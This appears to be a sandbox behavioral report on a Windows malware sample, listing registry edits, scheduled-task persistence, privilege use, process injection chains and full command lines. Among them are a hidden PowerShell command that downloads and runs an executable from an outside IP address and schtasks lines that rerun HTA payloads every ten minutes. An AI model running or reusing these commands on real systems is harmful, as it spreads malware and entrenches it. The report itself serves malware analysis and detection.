Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme = "0" C:\Windows\SysWOW64\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: 35 N/A C:\Temper\pTLQnagR.exe N/A
Token: SeSecurityPrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: SeSecurityPrivilege N/A C:\Temper\pTLQnagR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4556 wrote to memory of 5320 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\cmd.exe
PID 4556 wrote to memory of 5320 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\cmd.exe
PID 4556 wrote to memory of 5320 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\cmd.exe
PID 4556 wrote to memory of 6032 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\mshta.exe
PID 4556 wrote to memory of 6032 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\mshta.exe
PID 4556 wrote to memory of 6032 N/A C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe C:\Windows\SysWOW64\mshta.exe
PID 5320 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5320 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5320 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 6032 wrote to memory of 1972 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 6032 wrote to memory of 1972 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 6032 wrote to memory of 1972 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1972 wrote to memory of 5016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE
PID 1972 wrote to memory of 5016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE
PID 1972 wrote to memory of 5016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE
PID 5016 wrote to memory of 3584 N/A C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 5016 wrote to memory of 3584 N/A C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 5016 wrote to memory of 3584 N/A C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
PID 3584 wrote to memory of 5180 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe
PID 3584 wrote to memory of 5180 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe
PID 3584 wrote to memory of 5180 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe
PID 3584 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe
PID 3584 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe
PID 3584 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe
PID 3584 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe
PID 3584 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe
PID 3584 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe
PID 3788 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe C:\Temper\mSPVyMsH.exe
PID 3788 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe C:\Temper\mSPVyMsH.exe
PID 3788 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe C:\Temper\mSPVyMsH.exe
PID 3476 wrote to memory of 1480 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 1480 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 1480 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 1480 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 1480 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 1480 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Temper\pTLQnagR.exe
PID 3476 wrote to memory of 2248 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 3476 wrote to memory of 2248 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 3476 wrote to memory of 2248 N/A C:\Temper\mSPVyMsH.exe C:\Temper\pzoljWug.exe
PID 3476 wrote to memory of 5456 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 3476 wrote to memory of 5456 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 3476 wrote to memory of 5456 N/A C:\Temper\mSPVyMsH.exe C:\Temper\dHzrrTgp.exe
PID 3476 wrote to memory of 4556 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4556 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4556 N/A C:\Temper\mSPVyMsH.exe C:\Windows\SysWOW64\cmd.exe
PID 4556 wrote to memory of 5616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4556 wrote to memory of 5616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4556 wrote to memory of 5616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5456 wrote to memory of 3036 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 5456 wrote to memory of 3036 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 5456 wrote to memory of 3036 N/A C:\Temper\dHzrrTgp.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
PID 3036 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
PID 3036 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3036 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3036 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3036 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3036 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
PID 3036 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

Processes

C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe

"C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn qtAfdma3v2s /tr "mshta C:\Users\Admin\Desktop\jVtmykf5T.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\Desktop\jVtmykf5T.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn qtAfdma3v2s /tr "mshta C:\Users\Admin\Desktop\jVtmykf5T.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'Y9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE

"C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE"

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

"C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe"

C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe

"C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe"

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe

"C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe"

C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe

"C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe"

C:\Temper\mSPVyMsH.exe

"C:\Temper\mSPVyMsH.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c ""C:\Temper\pTLQnagR.exe" x -aoa -bso0 -bsp1 "C:\Temper\BJwqsqOu.zip" -pXx7hItTR -o"C:\Temper""

C:\Temper\pTLQnagR.exe

"C:\Temper\pTLQnagR.exe" x -aoa -bso0 -bsp1 "C:\Temper\BJwqsqOu.zip" -pXx7hItTR -o"C:\Temper"

C:\Temper\pzoljWug.exe

"C:\Temper\pzoljWug.exe"

C:\Temper\dHzrrTgp.exe

"C:\Temper\dHzrrTgp.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn "duLGPTLJO" /tr "C:\Temper\mSPVyMsH.exe" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "duLGPTLJO" /tr "C:\Temper\mSPVyMsH.exe" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat" "

C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe

nircmd win min process "cmd.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\reg.exe

reg query "HKU\S-1-5-19"

C:\Windows\SysWOW64\reg.exe

reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f

C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe

NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\l5SkW3O.bat" any_word

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe

"C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn LKALfma4sBr /tr "mshta C:\Users\Admin\Desktop\v8uiRYqvH.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\Desktop\v8uiRYqvH.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn LKALfma4sBr /tr "mshta C:\Users\Admin\Desktop\v8uiRYqvH.hta" /sc minute /mo 10 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'LWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\mode.com

Mode 79,49

C:\Windows\SysWOW64\cmd.exe

